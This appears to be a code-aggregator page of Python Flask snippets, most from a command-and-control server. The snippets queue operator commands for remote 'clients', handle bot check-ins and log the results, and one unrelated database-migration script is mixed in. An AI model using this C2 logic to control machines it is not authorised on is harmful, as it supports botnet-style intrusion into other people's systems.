Ejemplo n.º 1
0
    def api_cmd():
        ## Admin Form Submission
        c_input = request.form.getlist(
            'clients')  # Get list of clients from form
        cmd = request.form['command'].strip()  # Extract cmd from form

        # Reformat clients from JS input
        try:
            clients = c_input[0].split(',')
        except:
            clients = c_input[0]

        con = db_connect()

        # Begin checks of execution
        for c in clients:
            if c and cmd:
                # clientid:type / "1:py"
                cid, type = c.split(":")
                try:
                    # Encode and Send cmd to DB for execution
                    post_command(con, cid, current_user, cmd_encode(cmd))
                except Exception as e:
                    print(e)
                    # Close CMD and report error to user
                    post_command(con, cid, current_user, cmd_encode(cmd))
                    update_results(
                        con, cid,
                        cmd_encode("Server Error: {}".format(str(e))))
        con.close()
        return render_template('admin.html')
Ejemplo n.º 2
0
 def api_client():
     con = db_connect()
     c = active_clients(con)
     con.close()
     return Response(response=dumps(c, default=default),
                     status=200,
                     mimetype='application/json')
Ejemplo n.º 3
0
 def api_admin():
     DATA = []
     con = db_connect()
     for x in active_admins(con):
         obj = {}
         obj['User'] = x
         DATA.append(obj)
     con.close()
     return Response(response=dumps(DATA, default=default),
                     status=200,
                     mimetype='application/json')
Ejemplo n.º 4
0
 def change_pwd():
     if request.method == 'POST':
         if request.form['password'] == request.form['password2']:
             con = db_connect()
             update_admin(con, current_user, request.form['password'],
                          "Active")
             con.close()
             return render_template('success.html')
         else:
             return render_template('fail.html')
     return render_template('change_pwd.html', data=current_user)
Ejemplo n.º 5
0
 def add_admin():
     if request.method == 'POST':
         if request.form['password'] == request.form['password2']:
             con = db_connect()
             update_admin(con, request.form['username'],
                          request.form['password'], "Inactive")
             con.close()
             return render_template('success.html')
         else:
             return render_template('fail.html')
     return render_template('add_admin.html')
Ejemplo n.º 6
0
    def agent_handler(self, sock, request, remote_ip):
        # Main func to direct bot actions
        con = db_connect()
        try:
            # Get Client ID in DB
            id = update_client(con, remote_ip, request['Hostname'],
                               request['OS'], 'Active', request['PID'],
                               request['TYPE'], request['PROTOCOL'])
            # Decode response data to perform checks, but leave encoded into DB
            decoded_resp = cmd_decode(request['Data']).strip()
            if "-debug" in argv:
                print("[+] Response from {}({}): {}".format(
                    request['Hostname'], request['PID'],
                    decoded_resp.rstrip()))

            # Check if client in default state and CMD waiting for client
            cmd = cmd_check(con, id)
            if decoded_resp == "check-in" and cmd:
                if "-debug" in argv: print("[->] Sending command to client")
                self.send_cmd(sock, cmd)

            # Send OK (Default)
            elif decoded_resp == "check-in":
                return self.get_200(sock)

            # If "[Client] Close." response, set as inactive in database
            elif decoded_resp == "{} Closed.".format(request['Hostname']):
                try:
                    update_results(con, id, request['Data'])
                    update_client(con, remote_ip, request['Hostname'],
                                  request['OS'], 'Inactive', request['PID'],
                                  request['TYPE'], request['PROTOCOL'])

                except Exception as e:
                    update_results(con, id, cmd_encode(str(e)))
                    update_client(con, remote_ip, request['Hostname'],
                                  request['OS'], 'Inactive', request['PID'],
                                  request['TYPE'], request['PROTOCOL'])

            # Handle client results from recent CMD
            elif decoded_resp != "check-in":
                update_results(con, id, request['Data'])
                return self.get_200(sock)

        except Exception as e:
            print(e)
            self.get_200(sock)

        finally:
            con.close()
Ejemplo n.º 7
0
 def api_log():
     DATA = []
     con = db_connect()
     for x in cmd_log(con):
         obj = {}
         obj['User'] = x[0]
         obj['Agent'] = x[1]
         obj['Time'] = x[2]
         obj['Command'] = cmd_decode(x[3]).splitlines()[0]
         obj['Response'] = cmd_decode(x[4]).strip()
         DATA.append(obj)
     con.close()
     return Response(response=dumps(DATA, default=default),
                     status=200,
                     mimetype='application/json')
Ejemplo n.º 8
0
 def login():
     ## Admin Form Submission
     if request.method == 'POST':
         # Validate
         con = db_connect()
         login_check = admin_login(con, request.form['username'],
                                   request.form['password'])
         con.close()
         if login_check:
             user = User(request.form['username'])
             login_user(user, remember=False)
             return redirect("/", 302)
         else:
             render_template('login.html')
     else:
         return render_template('login.html')
Ejemplo n.º 9
0
 def logout():
     con = db_connect()
     admin_logout(con, current_user)
     con.close()
     logout_user()
     return redirect("/", 302)
Ejemplo n.º 10
0
# -*- coding: utf-8 -*-

import os.path
from migrate.versioning import api

from server.config import config
from server.config import SQLALCHEMY_MIGRATE_REPO
from server import db

#import sys
#sys.path.append(os.path.join(os.path.dirname(__file__), 'addons'))
#import audit_isa

SQLALCHEMY_DATABASE_URI = config['dbdriver'] + ':///' + config['dbname']

dbi = db.db_connect(SQLALCHEMY_DATABASE_URI)
db.metadata.create_all(dbi.database_engine)

if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):
    api.create(SQLALCHEMY_MIGRATE_REPO, 'database repository')
    api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
else:
    api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO,
                        api.version(SQLALCHEMY_MIGRATE_REPO))
Ejemplo n.º 11
0
 def api_clear():
     ## Clear pending commands
     con = db_connect()
     clear_pending(con)
     con.close()
     return render_template('admin.html', data=Markup(get_help()))